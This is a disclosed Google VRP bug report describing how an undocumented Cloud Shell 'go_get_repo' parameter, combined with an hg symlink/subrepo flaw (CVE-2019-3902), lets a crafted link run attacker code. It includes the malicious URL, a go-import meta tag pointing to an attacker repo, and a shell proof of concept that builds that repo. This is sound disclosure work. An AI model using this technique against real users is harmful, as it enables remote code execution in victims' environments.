Skip to Content (Press Enter)
Google
Bug Hunters
other in https://ssh.cloud.google.com/cloudshell/
Reported by:
wtm
Google VRP
triaged
04:10 | Sep 20, 2019
accepted
17:04 | Sep 21, 2019
fixed
05:03 | Jan 8, 2020
reward decided
$5,000
Summary: undocumented go_get_repo leads to code execution on cloudshell
Hey Google security team,
In the JS source code of cloudshell (
https://www.gstatic.com/_/cloudshell/_/js/k=cloudshell.csh.nl.myP8e5tp8zw.O/d=1/rs=APXSEb_DWM6Igg927MPp712LbP5xcQR_Aw/m=cloudshell
) i noticed an undocumented GET-parameter named 'go_get_repo'.
An attacker can abuse this parameter go gain code execution within the Cloudshell of the victim.
Setting the go_get_repo GET parameter to "go.offensi.com/go.html" invokes the 'go get go.offensi.com/go.html' shell command within Cloudshell. By setting it to go.offensi.com/go.html i can force the go-client to read the metadata i provided. In go.offensi.com/go.html i'm specifying that my go files are being stored in a Mercurial/hg repo:
"<meta name="go-import" content="go.offensi.com/go.html hg https://go.offensi.com/hgrepo/root">"
The malicious Mercurial repo on my server exploits a vulnerability in hg, which i discovered thanks to the use of Google Container Analysis running against a Cloudshell image i stored in gcr.io :) Debian 9 / Stretch is still vulnerable as can be seen here:
https://security-tracker.debian.org/tracker/CVE-2019-3902
Steps to reproduce:
Victim opens
https://ssh.cloud.google.com/cloudshell/editor?go_get_repo=go.offensi.com/go.html
Victim clicks 'OK'
Code is executed instantly  (the malicious repository writes a 'cut' binary to /home/<user>/gopath/bin, the 'cut' command is invoked in cloudshell_open after 'go get' has completed running). Ofcourse any writeable path on the filesystem can be chosen by modifying the evil repository.
Browser/OS: 
Latest Chrome /  Latest OSX
I hope this helps!
Kind regards, 
Offensi.com
Wouter ter Maat
ps. Replicating the evil repository can be done like this:
#!/bin/sh
# PoC for Google VRP by wtm@offensi.com
mkdir hgrepo
hg init hgrepo/root
cd hgrepo/root
ln -s ../../../bin
hg ci -qAm 'add symlink "bin"'
hg init ../../../bin
echo 'bin = bin' >> .hgsub
hg ci -qAm 'add subrepo "bin"'

cd ../../../bin
echo '#!/bin/sh' >> cut
echo 'wall You have been pwned!' >> cut
chmod +x cut
hg add cut
hg commit -m "evil cut bin"

cd /var/www/html/hgrepo/root
hg commit -m "final"

# now create the evil go.html file
登录
使用 Google 账号登录